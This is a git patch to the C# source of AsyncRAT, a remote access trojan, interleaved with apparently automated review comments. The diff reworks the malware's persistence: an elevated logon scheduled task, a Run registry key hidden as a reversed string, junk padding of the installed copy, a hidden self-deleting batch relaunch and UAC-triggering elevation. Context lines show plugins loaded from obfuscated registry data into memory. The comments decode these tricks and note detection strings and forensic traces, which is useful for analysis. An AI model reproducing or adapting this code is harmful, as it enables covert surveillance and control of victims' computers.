From b71f320fd0f0772cf8afd0f4990e69e6813290fd Mon Sep 17 00:00:00 2001
From: NYAN CAT
Date: Fri, 4 Oct 2019 07:13:19 +0300
Subject: [PATCH] Update
---
 AsyncRAT-C#/Client/Handle Packet/Packet.cs | 2 +-
 AsyncRAT-C#/Client/Install/NormalStartup.cs | 39 ++++++++++++-------
 AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs | 2 +-
 AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs | 2 +-
 .../Plugin/FileManager/FileManager/Plugin.cs | 3 +-
 .../Plugin/LimeLogger/LimeLogger/Plugin.cs | 2 +-
 .../Miscellaneous/Miscellaneous/Plugin.cs | 2 +-
 .../Options/Options/Handler/HandleUAC.cs | 3 +-
 .../Options/Handler/HandleUninstall.cs | 10 ++++-
 AsyncRAT-C#/Plugin/Options/Options/Plugin.cs | 3 +-
 .../ProcessManager/ProcessManager/Plugin.cs | 2 +-
 .../Plugin/Recovery/Recovery/Plugin.cs | 3 +-
 .../RemoteCamera/RemoteCamera/Plugin.cs | 2 +-
 .../RemoteDesktop/RemoteDesktop/Plugin.cs | 2 +-
 .../SendFile/Handler/HandleUninstall.cs | 6 ++-
 .../Plugin/SendFile/SendFile/Plugin.cs | 3 +-
 16 files changed, 52 insertions(+), 34 deletions(-)
diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
index 96c7d44..9dfa87d 100644
--- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
@@ -36,7 +36,7 @@ namespace Client.Handle_Packet
 Assembly assembly = AppDomain.CurrentDomain.Load(Convert.FromBase64String(Strings.StrReverse(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString))));
 Type type = assembly.GetType("Plugin.Plugin");
 dynamic instance = Activator.CreateInstance(type);
- instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), Methods._appMutex, Settings.MTX, Settings.BDOS, Settings.Install, Settings.InstallFile);
+ instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), Methods._appMutex, Settings.MTX, Settings.BDOS, Settings.Install);
 break;
 }
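Review bot: The `Run` call in Packet.cs is late-bound through `dynamic`, and nothing near it documents the loading path, which is what an analyst reading this file needs first. The context lines show the plugin assembly being built from a string returned by `SetRegistry.GetValue`, reversed with `Strings.StrReverse`, Base64-decoded and handed to `AppDomain.CurrentDomain.Load` as bytes, so the plugin presumably never exists as a file of its own. I would add a comment above the load such as `// Plugin bytes come from SetRegistry (reversed Base64), are loaded from memory and invoked late-bound as Plugin.Plugin.Run`. For detection this points at the stored value's contents and at byte-array assembly loads rather than at file writes. The enclosing switch case starts outside the hunk.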
diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs
index e8bee7c..47e6676 100644
--- a/AsyncRAT-C#/Client/Install/NormalStartup.cs
+++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs
@@ -15,8 +15,8 @@ namespace Client.Install
 {
 try
 {
- string installfullpath = Path.Combine(Environment.ExpandEnvironmentVariables(Settings.InstallFolder), Settings.InstallFile);
- if (Process.GetCurrentProcess().MainModule.FileName != installfullpath)
+ FileInfo installPath = new FileInfo(Path.Combine(Environment.ExpandEnvironmentVariables(Settings.InstallFolder), Settings.InstallFile));
+ if (Process.GetCurrentProcess().MainModule.FileName != installPath.FullName)
 {
 for (int i = 0; i < 10; i++)
@@ -28,13 +28,10 @@ namespace Client.Install
 {
 try
 {
- if (P.MainModule.FileName == installfullpath)
+ if (P.MainModule.FileName == installPath.FullName)
 P.Kill();
 }
- catch
- {
- Debug.WriteLine("NormalStartup Error : " + P.ProcessName);
- }
+ catch { }
 }
 if (Methods.IsAdmin())
 {
@@ -43,7 +40,7 @@ namespace Client.Install
 StartInfo = new ProcessStartInfo
 {
 FileName = "schtasks.exe",
- Arguments = "/create /f /sc ONLOGON /RL HIGHEST /tn " + @"""'" + Settings.InstallFile + @"""'" + " /tr " + @"""'" + installfullpath + @"""'",
+ Arguments = "/create /f /sc ONLOGON /RL HIGHEST /tn " + @"""'" + Path.GetFileNameWithoutExtension(installPath.FullName) + @"""'" + " /tr " + @"""'" + installPath.FullName + @"""'",
 WindowStyle = ProcessWindowStyle.Hidden,
 CreateNoWindow = true,
 }
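Review bot: In the NormalStartup.cs hunk at `@@ -43,7 +40,7 @@` the scheduled-task name changes from `Settings.InstallFile` to the install file's name without its extension, and neither the code nor the one-word commit message records that coupling. The uninstall handlers changed later in this commit recompute the same name from `Application.ExecutablePath`, so the two sides only agree when the running executable is the installed copy. A comment such as `// Task name = install file name without extension; HandleUninstall derives the same name from the running executable` would make that explicit. The resulting command line, `schtasks.exe /create /f /sc ONLOGON /RL HIGHEST` with `/tn` and `/tr` each wrapped in the unusual `"'` quoting, is a stable string for process-creation monitoring. The `ProcessStartInfo` initializer continues outside the hunk.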
@@ -54,17 +51,17 @@ namespace Client.Install
 {
 using (RegistryKey key = Registry.CurrentUser.OpenSubKey(Strings.StrReverse(@"\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS"), RegistryKeyPermissionCheck.ReadWriteSubTree))
 {
- key.SetValue(Settings.InstallFile, "\"" + installfullpath + "\"");
+ key.SetValue(Path.GetFileNameWithoutExtension(installPath.FullName), "\"" + installPath.FullName + "\"");
 }
 }
 FileStream fs;
- if (File.Exists(installfullpath))
+ if (File.Exists(installPath.FullName))
 {
- File.Delete(installfullpath);
+ File.Delete(installPath.FullName);
 Thread.Sleep(1000);
 }
- fs = new FileStream(installfullpath, FileMode.CreateNew);
+ fs = new FileStream(installPath.FullName, FileMode.CreateNew);
 byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
 fs.Write(clientExe, 0, clientExe.Length);
 byte[] junk = new byte[new Random().Next(40 * 1024 * 1000, 50 * 1024 * 1000)];
@@ -72,8 +69,24 @@ namespace Client.Install
 fs.Write(junk, 0, junk.Length);
 fs.Dispose();
- Process.Start(installfullpath);
 Methods.ClientExit();
+ string batch = Path.GetTempFileName() + ".bat";
+ using (StreamWriter sw = new StreamWriter(batch))
+ {
+ sw.WriteLine("@echo off");
+ sw.WriteLine("timeout 3 > NUL");
+ sw.WriteLine("START " + "\"" + "\" " + "\"" + installPath.FullName + "\"");
+ sw.WriteLine("CD " + Path.GetTempPath());
+ sw.WriteLine("DEL " + "\"" + Path.GetFileName(batch) + "\"" + " /f /q");
+ }
+ Process.Start(new ProcessStartInfo()
+ {
+ FileName = batch,
+ CreateNoWindow = true,
+ ErrorDialog = false,
+ UseShellExecute = false,
+ WindowStyle = ProcessWindowStyle.Hidden
+ });
 Environment.Exit(0);
 }
 }
diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs b/AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs
index 9fec2d9..f361f55 100644
--- a/AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs
+++ b/AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs
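Review bot: The registry path in the NormalStartup.cs hunk at `@@ -54,17 +51,17 @@` is kept as a reversed literal and restored with `Strings.StrReverse`, and no comment says which key it resolves to. Read backwards it is `Software\Microsoft\Windows\CurrentVersion\Run\` under `HKCU`; I would state that in a comment, `// Reversed literal: HKCU\Software\Microsoft\Windows\CurrentVersion\Run`, so a reviewer does not have to decode it. A static string search for the normal key path will miss this file, while the reversed literal itself is a usable match. After this change the value is named after the install file without its extension and holds the quoted full path. The enclosing method starts and ends outside the hunk.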
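Review bot: `Path.GetTempFileName()` in the NormalStartup.cs hunk at `@@ -72,8 +69,24 @@` creates a zero-byte `.tmp` file on disk, and the added code appends `.bat` to that name and writes a second file, so the `.tmp` placeholder is never used or removed. The batch deletes only itself by bare file name after a `CD` into the temp path that is written unquoted, so each install leaves the empty placeholder behind. The relaunch now runs through a hidden batch process that waits with `timeout 3` and then `START`s the installed copy, replacing the direct `Process.Start` that was removed, and none of this is commented. I would document it above the block, for example `// Relaunch via temp .bat: wait 3 s, START installed copy, self-delete; GetTempFileName() also leaves an empty .tmp file`. The context lines show the installed copy being padded from a `junk` buffer of 40 * 1024 * 1000 to 50 * 1024 * 1000 bytes, which makes its size a distinguishing trait.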
@@ -13,7 +13,7 @@ namespace Plugin
 public class Plugin
 {
 public static Socket Socket;
- public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
 {
 Debug.WriteLine("Plugin Invoked");
 Socket = socket;
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs
index 0a440aa..32e717c 100644
--- a/AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs
@@ -14,7 +14,7 @@ namespace Plugin
 public class Plugin
 {
 public static Socket Socket;
- public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
 {
 Debug.WriteLine("Plugin Invoked");
 Socket = socket;
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/Plugin.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/Plugin.cs
index 5bc9da7..a59807f 100644
--- a/AsyncRAT-C#/Plugin/FileManager/FileManager/Plugin.cs
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/Plugin.cs
@@ -20,14 +20,13 @@ namespace Plugin
 public static string Install;
 public static string InstallFile;
- public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
 {
 Debug.WriteLine("Plugin Invoked");
 AppMutex = mutex;
 Mutex = mtx;
 BDOS = bdos;
 Install = install;
- InstallFile = installFile;
 Socket = socket;
 Connection.ServerCertificate = certificate;
 Connection.Hwid = hwid;
diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Plugin.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Plugin.cs
index 9fec2d9..f361f55 100644
--- a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Plugin.cs
+++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Plugin.cs
@@ -13,7 +13,7 @@ namespace Plugin
 public class Plugin
 {
 public static Socket Socket;
- public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
 {
 Debug.WriteLine("Plugin Invoked");
 Socket = socket;
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Plugin.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Plugin.cs
index 0a440aa..32e717c 100644
--- a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Plugin.cs
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Plugin.cs
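Review bot: The static field `InstallFile` is still declared in the context lines of the FileManager Plugin.cs hunk, but once `InstallFile = installFile;` is removed nothing shown assigns it, so it stays null for the life of the plugin. The same leftover appears in the Options, Recovery and SendFile `Plugin.cs` hunks of this commit. Whether other code in those plugins still reads the field cannot be seen from the diff; only the two HandleUninstall handlers are visibly switched away from it. I would drop the declaration `public static string InstallFile;` or mark it `// unused since installFile was removed from Run`. The `Run` body continues outside the hunk.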
@@ -14,7 +14,7 @@ namespace Plugin
 public class Plugin
 {
 public static Socket Socket;
- public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
 {
 Debug.WriteLine("Plugin Invoked");
 Socket = socket;
diff --git a/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUAC.cs b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUAC.cs
index 3c48c07..4381a2b 100644
--- a/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUAC.cs
+++ b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUAC.cs
@@ -3,6 +3,7 @@ using System.Collections.Generic;
 using System.Diagnostics;
 using System.Linq;
 using System.Text;
+using System.Windows.Forms;
 namespace Plugin.Handler
 {
@@ -19,7 +20,7 @@ namespace Plugin.Handler
 StartInfo = new ProcessStartInfo
 {
 FileName = "cmd",
- Arguments = "/k START \"\" \"" + Process.GetCurrentProcess().MainModule.FileName + "\" & EXIT",
+ Arguments = "/k START \"\" \"" + Application.ExecutablePath + "\" & EXIT",
 WindowStyle = ProcessWindowStyle.Hidden,
 Verb = "runas",
 UseShellExecute = true
diff --git a/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs
index 2602919..725805e 100644
--- a/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs
+++ b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs
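Review bot: The `Arguments` line in the HandleUAC.cs hunk at `@@ -19,7 +20,7 @@` carries no comment on what the relaunch does or why the path source changed from `Process.GetCurrentProcess().MainModule.FileName` to `Application.ExecutablePath`. As shown, a hidden `cmd` is started with `Verb = "runas"` and `UseShellExecute = true`, which raises a UAC consent prompt, and it runs `/k START "" "<path>" & EXIT` to start the same executable again. I would add `// Relaunches the host executable elevated through cmd; Verb = "runas" triggers the UAC prompt` above the initializer. For monitoring, an elevated `cmd` whose command line contains `/k START` and `& EXIT` is the process-lineage trace this leaves. The initializer and the enclosing method continue outside the hunk.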
@@ -18,13 +18,13 @@ namespace Plugin.Handler
 try
 {
 if (!Methods.IsAdmin())
- Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Plugin.InstallFile);
+ Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Path.GetFileNameWithoutExtension(Application.ExecutablePath));
 else
 {
 Process.Start(new ProcessStartInfo()
 {
 FileName = "schtasks",
- Arguments = "/delete /f /tn " + @"""'" + Plugin.InstallFile + @"""'",
+ Arguments = "/delete /f /tn " + @"""'" + Path.GetFileNameWithoutExtension(Application.ExecutablePath) + @"""'",
 CreateNoWindow = true,
 ErrorDialog = false,
 UseShellExecute = false,
@@ -35,6 +35,12 @@ namespace Plugin.Handler
 catch { }
 }
+ try
+ {
+ Registry.CurrentUser.CreateSubKey(@"SOFTWARE\", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteSubKey(Connection.Hwid);
+ }
+ catch { }
+
 string batch = Path.GetTempFileName() + ".bat";
 using (StreamWriter sw = new StreamWriter(batch))
 {
diff --git a/AsyncRAT-C#/Plugin/Options/Options/Plugin.cs b/AsyncRAT-C#/Plugin/Options/Options/Plugin.cs
index 5bc9da7..a59807f 100644
--- a/AsyncRAT-C#/Plugin/Options/Options/Plugin.cs
+++ b/AsyncRAT-C#/Plugin/Options/Options/Plugin.cs
@@ -20,14 +20,13 @@ namespace Plugin
 public static string Install;
 public static string InstallFile;
- public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
 {
 Debug.WriteLine("Plugin Invoked");
 AppMutex = mutex;
 Mutex = mtx;
 BDOS = bdos;
 Install = install;
- InstallFile = installFile;
 Socket = socket;
 Connection.ServerCertificate = certificate;
 Connection.Hwid = hwid;
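Review bot: The block added in the Options HandleUninstall.cs hunk at `@@ -35,6 +35,12 @@` deletes a subkey of `HKCU\SOFTWARE\` named after `Connection.Hwid`, but no comment says what that key holds or that the deletion is best effort. `DeleteSubKey` throws when the subkey is missing or still has child subkeys, and the empty `catch { }` discards that, so a failed cleanup is indistinguishable from a successful one. I would add `// Best effort: removes HKCU\SOFTWARE\<Hwid>; failures are ignored`. For incident response the hunk confirms that a key named after the client's hardware id under `HKCU\SOFTWARE` is an artifact to look for, and that it can survive an uninstall. The method's start and the rest of the batch block are outside the hunk.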
diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Plugin.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Plugin.cs
index 9fec2d9..f361f55 100644
--- a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Plugin.cs
+++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Plugin.cs
@@ -13,7 +13,7 @@ namespace Plugin
 public class Plugin
 {
 public static Socket Socket;
- public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
 {
 Debug.WriteLine("Plugin Invoked");
 Socket = socket;
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Plugin.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Plugin.cs
index 5bc9da7..a59807f 100644
--- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Plugin.cs
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Plugin.cs
@@ -20,14 +20,13 @@ namespace Plugin
 public static string Install;
 public static string InstallFile;
- public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
 {
 Debug.WriteLine("Plugin Invoked");
 AppMutex = mutex;
 Mutex = mtx;
 BDOS = bdos;
 Install = install;
- InstallFile = installFile;
 Socket = socket;
 Connection.ServerCertificate = certificate;
 Connection.Hwid = hwid;
diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Plugin.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Plugin.cs
index 9fec2d9..f361f55 100644
--- a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Plugin.cs
+++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Plugin.cs
@@ -13,7 +13,7 @@ namespace Plugin
 public class Plugin
 {
 public static Socket Socket;
- public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
 {
 Debug.WriteLine("Plugin Invoked");
 Socket = socket;
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Plugin.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Plugin.cs
index 9fec2d9..f361f55 100644
--- a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Plugin.cs
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Plugin.cs
@@ -13,7 +13,7 @@ namespace Plugin
 public class Plugin
 {
 public static Socket Socket;
- public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
 {
 Debug.WriteLine("Plugin Invoked");
 Socket = socket;
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs
index 8b36cb4..3a211d9 100644
--- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs
@@ -18,13 +18,13 @@ namespace Plugin.Handler
 try
 {
 if (!Methods.IsAdmin())
- Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Plugin.InstallFile);
+ Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Path.GetFileNameWithoutExtension(Application.ExecutablePath));
 else
 {
 Process.Start(new ProcessStartInfo()
 {
 FileName = "schtasks",
- Arguments = "/delete /f /tn " + @"""'" + Plugin.InstallFile + @"""'",
+ Arguments = "/delete /f /tn " + @"""'" + Path.GetFileNameWithoutExtension(Application.ExecutablePath) + @"""'",
 CreateNoWindow = true,
 ErrorDialog = false,
 UseShellExecute = false,
@@ -35,6 +35,8 @@ namespace Plugin.Handler
 catch { }
 }
+ Registry.CurrentUser.CreateSubKey(@"", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteSubKey(Connection.Hwid);
+
 string batch = Path.GetTempFileName() + ".bat";
 using (StreamWriter sw = new StreamWriter(batch))
 {
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Plugin.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Plugin.cs
index 5bc9da7..a59807f 100644
--- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Plugin.cs
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Plugin.cs
@@ -20,14 +20,13 @@ namespace Plugin
 public static string Install;
 public static string InstallFile;
- public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
 {
 Debug.WriteLine("Plugin Invoked");
 AppMutex = mutex;
 Mutex = mtx;
 BDOS = bdos;
 Install = install;
- InstallFile = installFile;
 Socket = socket;
 Connection.ServerCertificate = certificate;
 Connection.Hwid = hwid;
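Review bot: The registry cleanup added in the SendFile HandleUninstall.cs hunk at `@@ -35,6 +35,8 @@` diverges from the Options copy in this same commit: it passes `@""` to `CreateSubKey` where the other passes `@"SOFTWARE\"`, and it is not wrapped in `try`/`catch`. As written it presumably looks for the `Connection.Hwid` subkey directly under `HKCU` rather than under `SOFTWARE`, and `DeleteSubKey` throws when that subkey does not exist, so unless a handler outside the hunk catches it the batch step that follows would not run. The divergence is undocumented; at minimum I would record it with `// NOTE: differs from Options/HandleUninstall (root path "" and no try/catch)`. For responders the likely effect is that an uninstall issued through this plugin leaves `HKCU\SOFTWARE\<Hwid>` and the installed file in place. The method's start and the rest of the batch block are outside the hunk.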